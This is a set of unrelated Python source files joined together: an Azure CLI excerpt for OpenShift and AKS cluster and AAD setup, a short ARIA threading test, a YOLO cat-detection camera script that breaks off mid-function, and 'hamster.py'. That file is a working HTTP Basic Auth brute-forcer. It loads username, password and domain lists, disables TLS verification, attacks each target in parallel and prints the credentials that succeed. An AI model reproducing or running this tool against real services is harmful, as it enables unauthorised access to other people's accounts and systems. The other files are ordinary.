rbac_client = get_graph_rbac_management_client(cli_ctx)
if create:
# This reply_url is temporary set since Azure need one to create the AAD.
app_id_name = 'https://{}'.format(name)
if not aad_client_app_secret:
aad_client_app_secret = _create_client_secret()
# Delegate Sign In and Read User Profile permissions on Windows Azure Active Directory API
resource_access = ResourceAccess(id="311a71cc-e848-46a1-bdf8-97ff7156d8e6",
additional_properties=None, type="Scope")
# Read directory permissions on Windows Azure Active Directory API
directory_access = ResourceAccess(id="5778995a-e1bf-45b8-affa-663a9f3f4d04",
additional_properties=None, type="Role")
required_osa_aad_access = RequiredResourceAccess(resource_access=[resource_access, directory_access],
additional_properties=None,
resource_app_id="00000002-0000-0000-c000-000000000000")
list_aad_filtered = list(rbac_client.applications.list(filter="identifierUris/any(s:s eq '{}')"
.format(app_id_name)))
if list_aad_filtered:
aad_client_app_id = list_aad_filtered[0].app_id
# Updating reply_url with the correct FQDN information returned by the RP
reply_url = 'https://{}/oauth2callback/Azure%20AD'.format(
identifier)
update_application(client=rbac_client.applications,
object_id=list_aad_filtered[0].object_id,
display_name=name,
identifier_uris=[app_id_name],
reply_urls=[reply_url],
homepage=app_id_name,
password=aad_client_app_secret,
required_resource_accesses=[required_osa_aad_access])
logger.info('Updated AAD: %s', aad_client_app_id)
else:
result, _aad_session_key = create_application(client=rbac_client.applications,
display_name=name,
identifier_uris=[
app_id_name],
homepage=app_id_name,
password=aad_client_app_secret,
required_resource_accesses=[required_osa_aad_access])
aad_client_app_id = result.app_id
logger.info('Created an AAD: %s', aad_client_app_id)
# Get the TenantID
if aad_tenant_id is None:
profile = Profile(cli_ctx=cli_ctx)
_, _, aad_tenant_id = profile.get_login_credentials()
return OpenShiftManagedClusterAADIdentityProvider(
client_id=aad_client_app_id,
secret=aad_client_app_secret,
tenant_id=aad_tenant_id,
kind='AADIdentityProvider',
customer_admin_group_id=customer_admin_group_id)
def _ensure_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(
salt, dns_name_prefix, location)
service_principal, _aad_session_key = _build_service_principal(
rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# add role first before save it
if not _add_role_assignment(cli_ctx, 'Contributor', service_principal):
logger.warning('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
else:
# --service-principal specfied, validate --client-secret was too
if not client_secret:
raise CLIError(
'--client-secret is required if --service-principal is specified')
return {
'client_secret': client_secret,
'service_principal': service_principal,
}
def _create_client_secret():
# Add a special character to satisfy AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(
os.urandom(10)).decode('utf-8') + special_char
return client_secret
def _get_rg_location(ctx, resource_group_name, subscription_id=None):
groups = cf_resource_groups(ctx, subscription_id=subscription_id)
# Just do the get, we don't need the result, it will error out if the group doesn't exist.
rg = groups.get(resource_group_name)
return rg.location
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
raise CLIError(
'Please specify both min-count and max-count when --enable-cluster-autoscaler enabled')
if int(min_count) > int(max_count):
raise CLIError(
'Value of min-count should be less than or equal to value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError(
'node-count is not in the range of min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
if min_count is not None or max_count is not None:
raise CLIError(
'min-count and max-count are required for --enable-cluster-autoscaler, please use the flag')
def _validate_autoscaler_update_counts(min_count, max_count, is_enable_or_update):
"""
Validates the min, max, and node count when performing an update
"""
if min_count is None or max_count is None:
if is_enable_or_update:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler is set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError(
'Value of min-count should be less than or equal to value of max-count.')
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(
path, temp_path, overwrite_existing, context_name)
except yaml.YAMLError as ex:
logger.warning(
'Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def _remove_osa_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of OpenShift ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags', 'plan', 'type', 'id']
ap_master_attrs = ['name', 'os_type']
net_attrs = ['peer_vnet_id']
for managed_cluster in managed_clusters:
for attr in attrs:
if hasattr(managed_cluster, attr) and getattr(managed_cluster, attr) is None:
delattr(managed_cluster, attr)
for attr in ap_master_attrs:
if getattr(managed_cluster.master_pool_profile, attr, None) is None:
delattr(managed_cluster.master_pool_profile, attr)
for attr in net_attrs:
if getattr(managed_cluster.network_profile, attr, None) is None:
delattr(managed_cluster.network_profile, attr)
return managed_clusters
def _validate_aci_location(norm_location):
"""
Validate the Azure Container Instance location
"""
aci_locations = [
"australiaeast",
"canadacentral",
"centralindia",
"centralus",
"eastasia",
"eastus",
"eastus2",
"eastus2euap",
"japaneast",
"northcentralus",
"northeurope",
"southcentralus",
"southeastasia",
"southindia",
"uksouth",
"westcentralus",
"westus",
"westus2",
"westeurope"
]
if norm_location not in aci_locations:
raise CLIError('Azure Container Instance is not available at location "{}".'.format(norm_location) +
' The available locations are "{}"'.format(','.join(aci_locations)))
def osa_list(cmd, client, resource_group_name=None):
if resource_group_name:
managed_clusters = client.list_by_resource_group(resource_group_name)
else:
managed_clusters = client.list()
return _remove_osa_nulls(list(managed_clusters))
def _format_workspace_id(workspace_id):
workspace_id = workspace_id.strip()
if not workspace_id.startswith('/'):
workspace_id = '/' + workspace_id
if workspace_id.endswith('/'):
workspace_id = workspace_id.rstrip('/')
return workspace_id
def openshift_create(cmd, client, resource_group_name, name, # pylint: disable=too-many-locals
location=None,
compute_vm_size="Standard_D4s_v3",
compute_count=3,
aad_client_app_id=None,
aad_client_app_secret=None,
aad_tenant_id=None,
vnet_prefix="10.0.0.0/8",
subnet_prefix="10.0.0.0/24",
vnet_peer=None,
tags=None,
no_wait=False,
workspace_id=None,
customer_admin_group_id=None):
OpenShiftManagedClusterAgentPoolProfile = cmd.get_models('OpenShiftManagedClusterAgentPoolProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
OpenShiftAgentPoolProfileRole = cmd.get_models('OpenShiftAgentPoolProfileRole',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
OpenShiftManagedClusterIdentityProvider = cmd.get_models('OpenShiftManagedClusterIdentityProvider',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
OpenShiftManagedCluster = cmd.get_models('OpenShiftManagedCluster',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
OpenShiftRouterProfile = cmd.get_models('OpenShiftRouterProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
NetworkProfile = cmd.get_models('NetworkProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
OpenShiftManagedClusterAuthProfile = cmd.get_models('OpenShiftManagedClusterAuthProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
OpenShiftManagedClusterMonitorProfile = cmd.get_models('OpenShiftManagedClusterMonitorProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
logger.warning('Support for the creation of ARO 3.11 clusters ends 30 Nov 2020. Please see aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long
if location is None:
location = _get_rg_location(cmd.cli_ctx, resource_group_name)
agent_pool_profiles = []
agent_node_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='compute', # Must be 12 chars or less before ACS RP adds to it
count=int(compute_count),
vm_size=compute_vm_size,
os_type="Linux",
role=OpenShiftAgentPoolProfileRole.compute,
subnet_cidr=subnet_prefix
)
agent_infra_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='infra', # Must be 12 chars or less before ACS RP adds to it
count=int(3),
vm_size="Standard_D4s_v3",
os_type="Linux",
role=OpenShiftAgentPoolProfileRole.infra,
subnet_cidr=subnet_prefix
)
agent_pool_profiles.append(agent_node_pool_profile)
agent_pool_profiles.append(agent_infra_pool_profile)
agent_master_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='master', # Must be 12 chars or less before ACS RP adds to it
count=int(3),
vm_size="Standard_D4s_v3",
os_type="Linux",
subnet_cidr=subnet_prefix
)
identity_providers = []
create_aad = False
# Validating if the cluster is not existing since we are not supporting the AAD rotation on OSA for now
try:
client.get(resource_group_name, name)
except CloudError:
# Validating if aad_client_app_id aad_client_app_secret aad_tenant_id are set
if aad_client_app_id is None and aad_client_app_secret is None and aad_tenant_id is None:
create_aad = True
osa_aad_identity = _ensure_osa_aad(cmd,
cmd.cli_ctx,
aad_client_app_id=aad_client_app_id,
aad_client_app_secret=aad_client_app_secret,
aad_tenant_id=aad_tenant_id, identifier=None,
name=name, create=create_aad,
customer_admin_group_id=customer_admin_group_id)
identity_providers.append(
OpenShiftManagedClusterIdentityProvider(
name='Azure AD',
provider=osa_aad_identity
)
)
auth_profile = OpenShiftManagedClusterAuthProfile(
identity_providers=identity_providers)
default_router_profile = OpenShiftRouterProfile(name='default')
if vnet_peer is not None:
from msrestazure.tools import is_valid_resource_id, resource_id
if not is_valid_resource_id(vnet_peer):
vnet_peer = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network', type='virtualNetwork',
name=vnet_peer
)
if workspace_id is not None:
workspace_id = _format_workspace_id(workspace_id)
monitor_profile = OpenShiftManagedClusterMonitorProfile(
enabled=True, workspace_resource_id=workspace_id) # pylint: disable=line-too-long
else:
monitor_profile = None
network_profile = NetworkProfile(
vnet_cidr=vnet_prefix, peer_vnet_id=vnet_peer)
osamc = OpenShiftManagedCluster(
location=location, tags=tags,
open_shift_version="v3.11",
network_profile=network_profile,
auth_profile=auth_profile,
agent_pool_profiles=agent_pool_profiles,
master_pool_profile=agent_master_pool_profile,
router_profiles=[default_router_profile],
monitor_profile=monitor_profile)
try:
# long_running_operation_timeout=300
result = sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name=resource_group_name, resource_name=name, parameters=osamc)
result = LongRunningOperation(cmd.cli_ctx)(result)
instance = client.get(resource_group_name, name)
_ensure_osa_aad(cmd,
cmd.cli_ctx,
aad_client_app_id=osa_aad_identity.client_id,
aad_client_app_secret=osa_aad_identity.secret,
aad_tenant_id=osa_aad_identity.tenant_id, identifier=instance.public_hostname,
name=name, create=create_aad)
except CloudError as ex:
if "The resource type could not be found in the namespace 'Microsoft.ContainerService" in ex.message:
raise CLIError(
'Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed') # pylint: disable=line-too-long
if "No registered resource provider found for location" in ex.message:
raise CLIError(
'Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed') # pylint: disable=line-too-long
raise ex
def openshift_show(cmd, client, resource_group_name, name):
logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long
mc = client.get(resource_group_name, name)
return _remove_osa_nulls([mc])[0]
def openshift_scale(cmd, client, resource_group_name, name, compute_count, no_wait=False):
logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long
instance = client.get(resource_group_name, name)
# TODO: change this approach when we support multiple agent pools.
idx = 0
for i in range(len(instance.agent_pool_profiles)):
if instance.agent_pool_profiles[i].name.lower() == "compute":
idx = i
break
instance.agent_pool_profiles[idx].count = int(
compute_count) # pylint: disable=no-member
# null out the AAD profile and add manually the masterAP name because otherwise validation complains
instance.master_pool_profile.name = "master"
instance.auth_profile = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def openshift_monitor_enable(cmd, client, resource_group_name, name, workspace_id, no_wait=False):
OpenShiftManagedClusterMonitorProfile = cmd.get_models('OpenShiftManagedClusterMonitorProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long
instance = client.get(resource_group_name, name)
workspace_id = _format_workspace_id(workspace_id)
monitor_profile = OpenShiftManagedClusterMonitorProfile(
enabled=True, workspace_resource_id=workspace_id) # pylint: disable=line-too-long
instance.monitor_profile = monitor_profile
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def openshift_monitor_disable(cmd, client, resource_group_name, name, no_wait=False):
OpenShiftManagedClusterMonitorProfile = cmd.get_models('OpenShiftManagedClusterMonitorProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long
instance = client.get(resource_group_name, name)
monitor_profile = OpenShiftManagedClusterMonitorProfile(
enabled=False, workspace_resource_id=None) # pylint: disable=line-too-long
instance.monitor_profile = monitor_profile
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def _is_msi_cluster(managed_cluster):
return (managed_cluster and managed_cluster.identity and
(managed_cluster.identity.type.casefold() == "systemassigned" or
managed_cluster.identity.type.casefold() == "userassigned"))
def _put_managed_cluster_ensuring_permission(
cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
subscription_id,
resource_group_name,
name,
managed_cluster,
monitoring_addon_enabled,
ingress_appgw_addon_enabled,
virtual_node_addon_enabled,
need_grant_vnet_permission_to_cluster_identity,
vnet_subnet_id,
enable_managed_identity,
attach_acr,
headers,
no_wait
):
# some addons require post cluster creation role assigment
need_post_creation_role_assignment = (monitoring_addon_enabled or
ingress_appgw_addon_enabled or
(enable_managed_identity and attach_acr) or
virtual_node_addon_enabled or
need_grant_vnet_permission_to_cluster_identity)
if need_post_creation_role_assignment:
# adding a wait here since we rely on the result for role assignment
cluster = LongRunningOperation(cmd.cli_ctx)(client.begin_create_or_update(
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
headers=headers))
cloud_name = cmd.cli_ctx.cloud.name
# add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
# mdm metrics is supported only in azure public cloud, so add the role assignment only in this cloud
if monitoring_addon_enabled and cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(cluster, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
_add_ingress_appgw_addon_role_assignment(cluster, cmd)
if virtual_node_addon_enabled:
_add_virtual_node_role_assignment(cmd, cluster, vnet_subnet_id)
if need_grant_vnet_permission_to_cluster_identity:
if not _create_role_assignment(cmd.cli_ctx, 'Network Contributor',
cluster.identity.principal_id, scope=vnet_subnet_id,
resolve_assignee=False):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
if enable_managed_identity and attach_acr:
# Attach ACR to cluster enabled managed identity
if cluster.identity_profile is None or \
cluster.identity_profile["kubeletidentity"] is None:
logger.warning('Your cluster is successfully created, but we failed to attach '
'acr to it, you can manually grant permission to the identity '
'named <ClUSTER_NAME>-agentpool in MC_ resource group to give '
'it permission to pull from ACR.')
else:
kubelet_identity_client_id = cluster.identity_profile["kubeletidentity"].client_id
_ensure_aks_acr(cmd.cli_ctx,
client_id=kubelet_identity_client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
else:
cluster = sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
headers=headers)
return cluster
def _ensure_cluster_identity_permission_on_kubelet_identity(cli_ctx, cluster_identity_object_id, scope):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope.lower() != scope.lower():
continue
if not i.role_definition_id.lower().endswith(CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID):
continue
if i.principal_id.lower() != cluster_identity_object_id.lower():
continue
# already assigned
return
if not _add_role_assignment(cli_ctx, CONST_MANAGED_IDENTITY_OPERATOR_ROLE, cluster_identity_object_id,
is_service_principal=False, scope=scope):
raise UnauthorizedError('Could not grant Managed Identity Operator '
'permission to cluster identity at scope {}'.format(scope))
|
hamster.py | import argparse
import requests
from requests.auth import HTTPBasicAuth
from threading import Thread
import time
from colorama import init, Fore, Back, Style
import pdb
import urllib3
import ssl
urllib3.disable_warnings()
from multiprocessing import Process
class File():
def __init__(self, fileName, mode):
self.fileName = fileName
self.mode = mode
def __enter__(self):
self.f = open(self.fileName, self.mode)
return self.f
def __exit__(self, exc_type, exc_val, exc_tb):
self.f.close()
class Attack:
def __init__(self):
self.parser = argparse.ArgumentParser(description="Hamster v1 && github.com/ferhatcil")
self.parser.add_argument('-U', '--users', required=False, help="you can upload a txt file filled with usernames")
self.parser.add_argument('-P', '--passwords', required=False, help="you can upload a txt file filled with passwords")
self.parser.add_argument('-u', '--user', required=False, help="you can specify only one username")
self.parser.add_argument('-p', '--password', required=False, help="you can specify only one password")
self.parser.add_argument('-D', '--domains', required=False, help="you can upload a txt file filled with domains")
self.parser.add_argument('-d', '--domain', required=False, help="you can specify only one domain")
self.parser.add_argument('-v', action='store_true', default=False, help="you can upload a txt file filled with usernames")
self.args = self.parser.parse_args()
self.status = False
self.loader()
def loader(self):
self.users = []
self.passwords = []
self.domains = []
if (self.args.users):
with File(self.args.users, 'r') as file:
for line in file:
self.users.append(line.strip().split(" ")[0])
if (self.args.passwords):
with File(self.args.passwords, 'r') as file:
for line in file:
self.passwords.append(line.strip().split(" ")[0])
if (self.args.domains):
with File(self.args.domains, 'r') as file:
for line in file:
self.domains.append(line.strip().split(" ")[0])
if (self.args.user):
self.users.append(self.args.user)
if (self.args.password):
self.passwords.append(self.args.password)
if (self.args.domain):
self.domains.append(self.args.domain)
procs = []
proc = Process(target=self.bruter,args=('',))
procs.append(proc)
proc.start()
for url in self.domains:
proc = Process(target=self.bruter, args=(url,))
procs.append(proc)
proc.start()
for proc in procs:
proc.join()
def bruter(self, url):
try:
#pdb.set_trace()
if url:
try:
r = requests.get(url, verify=ssl.CERT_NONE)
except requests.exceptions.ConnectionError:
print("{} address could not be reached at the moment. If you are browsing with a domain list, please remove the unreachable domains from your list for the health of the program.".format(url))
self.status = False
if r.status_code == 401:
for user in self.users:
for passw in self.passwords:
resp = requests.get(url, auth = HTTPBasicAuth(username=user, password=passw), verify=ssl.CERT_NONE)
if (resp.status_code == 200):
print(Fore.GREEN + "[+]" + Style.RESET_ALL + " {} username: {} password: {}".format(url,user,passw))
self.status = True
break
elif(self.args.v == True):
print(Fore.RED + "[-]" + Style.RESET_ALL + " {} username: {} password: {}".format(url,user,passw))
if self.status == True:
break
elif(self.args.v==True):
print(Fore.RED + "[-]" + Style.RESET_ALL + " There is no HTTPBasicAuth at the {} address".format(url))
except requests.exceptions.SSLError:
print("SSLError")
except UnboundLocalError:
print("UnboundLocalError")
except KeyboardInterrupt:
pass
if __name__ == '__main__':
try:
go = Attack()
except KeyboardInterrupt:
print(" GoodBye!")
|
test_threading.py | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
from aria.utils import threading
def test_exception_raised_from_thread():
def error_raising_func():
raise ValueError('This is an error')
thread = threading.ExceptionThread(target=error_raising_func)
thread.start()
thread.join()
assert thread.is_error()
with pytest.raises(ValueError):
thread.raise_error_if_exists()
|
object-ident.py | import cv2
import time
import os
import pprint
import re
import numpy as np
import pygame
import queue
import threading
import signal
import sys
import ffmpeg
pp = pprint.PrettyPrinter(indent=4)
CONF_THRESH, NMS_THRESH = 0.9, 0.5
classNames = []
soundMeow = "/z/camera/Meow-cat-sound-effect.mp3"
pygame.mixer.init()
pygame.mixer.music.load(soundMeow)
#pygame.mixer.music.play()
cw = {}
cw["yolov3"] = {}
cw["yolov3"]["configPath"] = "/home/dpd/darknet-yolo4/cfg/yolov3.cfg"
cw["yolov3"]["weightsPath"] = "/home/dpd/darknet/yolov3.weights"
cw["yolov3"]["coconames"] = "/home/dpd/darknet-yolo4/data/coco.names"
cw["yolov4tiny"] = {}
cw["yolov4tiny"]["configPath"] = "/home/dpd/darknet-yolo4/cfg/yolov4-tiny.cfg"
cw["yolov4tiny"]["weightsPath"] = "/z/camera/yolov4-tiny.conv.29"
cw["yolov4tiny"]["coconames"] = "/home/dpd/darknet-yolo4/data/coco.names"
cw["yolov4tiny.custom"] = {}
cw["yolov4tiny.custom"]["configPath"] = "/z/camera/communitycats/custom_data/cfg/yolov-tiny-custom.cfg"
cw["yolov4tiny.custom"]["weightsPath"] = "/z/camera/communitycats/custom_data/backup/yolov-tiny-custom_final.weights"
cw["yolov4tiny.custom"]["coconames"] = "/z/camera/communitycats/custom_data/custom.names.7"
cw["yolo.320v1"] = {}
cw["yolo.320v1"]["configPath"] = "/z/camera/communitycats/custom_data/cfg/yolov-tiny-custom-320v1.cfg"
cw["yolo.320v1"]["weightsPath"] = "/z/camera/communitycats/custom_data/backup/yolov-tiny-custom_final-320v1.weights"
cw["yolo.320v1"]["coconames"] = "/z/camera/communitycats/custom_data/custom.names.7"
cw["yolo.416v1.64"] = {}
cw["yolo.416v1.64"]["configPath"] = "/z/camera/communitycats/custom_data/cfg/yolov-tiny-custom-416v1-64.cfg"
cw["yolo.416v1.64"]["weightsPath"] = "/z/camera/communitycats/custom_data/backup/yolov-tiny-custom_final-416v1-64.weights"
cw["yolo.416v1.64"]["coconames"] = "/z/camera/communitycats/custom_data/backup/custom.names.7"
cw["yolo.416v2.64"] = {}
cw["yolo.416v2.64"]["configPath"] = "/z/camera/communitycats/custom_data/cfg/yolov-tiny-custom-416v2-64.cfg"
cw["yolo.416v2.64"]["weightsPath"] = "/z/camera/communitycats/custom_data/backup/yolov-tiny-custom_final-416v2-64.weights"
cw["yolo.416v2.64"]["coconames"] = "/z/camera/communitycats/custom_data/backup/custom.names.9"
cw["yolo.416v3.64"] = {}
cw["yolo.416v3.64"]["configPath"] = "/z/camera/communitycats/custom_data/cfg/yolov-tiny-custom-416v3-64.cfg"
#cw["yolo.416v3.64"]["weightsPath"] = "/z/camera/communitycats/custom_data/backup/yolov-tiny-custom_final-416v3-64.weights"
cw["yolo.416v3.64"]["weightsPath"] = "/z/camera/communitycats/custom_data/backup/yolov-tiny-custom-416v3-64_final.weights"
cw["yolo.416v3.64"]["coconames"] = "/z/camera/communitycats/custom_data/backup/custom-names-7v3.txt"
pkgVer = "yolo.416v3.64"
classNamesToIds = {}
with open(cw[pkgVer]["coconames"], "r") as f:
classes = [line.strip() for line in f.readlines()]
colorsPencils = {}
colorsPencils['lime'] = (0, 250, 142)
colorsPencils['maraschino'] = (0, 38, 255)
colorsPencils['tangerine'] = (0, 147, 255)
colorsPencils['lemon'] = (0, 251, 255)
colorsPencils['blueberry'] = (255, 51, 4)
colorsPencils['stawberry'] = (146, 47, 255)
colorsPencils['snow'] = (255, 255, 255)
colorsPencils['lead'] = (33, 33, 33)
colorsPencils['turquoise'] = (255, 253, 0)
colors = []
# colors[classNamesToIds['cat']] = colorsPencils['blueberry']
# colors[classNamesToIds['cat-domino']] = colorsPencils['lemon']
# colors[classNamesToIds['cat-kitten6']] = colorsPencils['stawberry']
# colors[classNamesToIds['cat-olive']] = colorsPencils['maraschino']
# colors[classNamesToIds['opossum']] = colorsPencils['lime']
# colors[classNamesToIds['raccoon']] = colorsPencils['tangerine']
# colors[classNamesToIds['skunk']] = colorsPencils['turquoise']
colors = (colorsPencils['turquoise'],
colorsPencils['tangerine'],
colorsPencils['lime'],
colorsPencils['maraschino'],
colorsPencils['stawberry'],
colorsPencils['lemon'],
colorsPencils['blueberry']
)
print (colors)
def ResizeWithAspectRatio(image, width=None, height=None, inter=cv2.INTER_AREA):
dim = None
(h, w) = image.shape[:2]
if width is None and height is None:
return image
if width is None:
r = height / float(h)
dim = (int(w * r), height)
else:
r = width / float(w)
dim = (width, int(h * r))
return cv2.resize(image, dim, interpolation=inter)
def getObjects(img, net, thres, nms, draw=True, objects=[], frameCounter=0):
# Get the output layer from YOLO
layers = net.getLayerNames()
output_layers = [layers[i[0] - 1] for i in net.getUnconnectedOutLayers()]
data = []
# Read and convert the image to blob and perform forward pass to get the bounding boxes with their confidence scores
#img = cv2.imread(args.image)
height, width = img.shape[:2]
blob = cv2.dnn.blobFromImage(img, 1/300, (416, 416), swapRB=True, crop=False)
net.setInput(blob)
layer_outputs = net.forward(output_layers)
class_ids, confidences, b_boxes = [], [], []
for output in layer_outputs:
for detection in output:
scores = detection[5:]
class_id = np.argmax(scores)
confidence = scores[class_id]
if confidence > CONF_THRESH:
center_x, center_y, w, h = (detection[0:4] * np.array([width, height, width, height])).astype('int')
x = int(center_x - w / 2)
y = int(center_y - h / 2)
b_boxes.append([x, y, int(w), int(h)])
confidences.append(float(confidence))
class_ids.append(int(class_id))
# Perform non maximum suppression for the bounding boxes to filter overlapping and low confident bounding boxes
#indices = cv2.dnn.NMSBoxes(b_boxes, confidences, CONF_THRESH, NMS_THRESH).flatten().tolist()
try:
indices = cv2.dnn.NMSBoxes(b_boxes, confidences, CONF_THRESH, NMS_THRESH).flatten().tolist()
test1 = indices[0]
except AttributeError:
#print ("AttributeError: no objects detected\n");
return img, False, data
i=0
ih, iw, ic = img.shape
#print ( " X x Y: {} {}", ih,iw)
is_cat = False
# for index in indices:
# className = classes[class_ids[index]]
# if re.search("^cat", className):
# is_cat = 1
# is_cat_hash[className] = 1
#pp.pprint (is_cat_hash)
for index in indices:
x=0
y=0
w=200
h=200
className = "NotSet"
conf = "0.00"
try:
x, y, w, h = b_boxes[index]
className = classes[class_ids[index]]
classId = class_ids[index]
except IndexError:
print("IndexError");
try:
conf = str(round(confidences[index]*100,2))
except IndexError:
print("IndexError: list index out of range index:{} ".format(index))
print("class_ids: ", class_ids )
print("confidences", confidences)
try:
cv2.rectangle(img, (x, y), (x + w, y + h), colors[classId], 2)
labelx = x + 10
if re.search("^cat-", className):
labelx = int(x + w/2 + 10)
cv2.putText(img, className, (labelx, y - 20), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1.2, colors[classId], 2)
cv2.putText(img, conf, (labelx, y - 50), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1.2, colors[classId], 2)
cv2.putText(img, className, ( 125, 75+(35*i)), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1.3, colors[classId], 2)
cv2.putText(img, conf, (20, 75+(35*i)), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1.3, colors[classId], 2)
i += 1
if re.search("^cat", className):
is_cat = True
data.append( {
'frame': frameCounter,
'class': className,
'conf': conf,
'x':x,
'y':y,
'w':w,
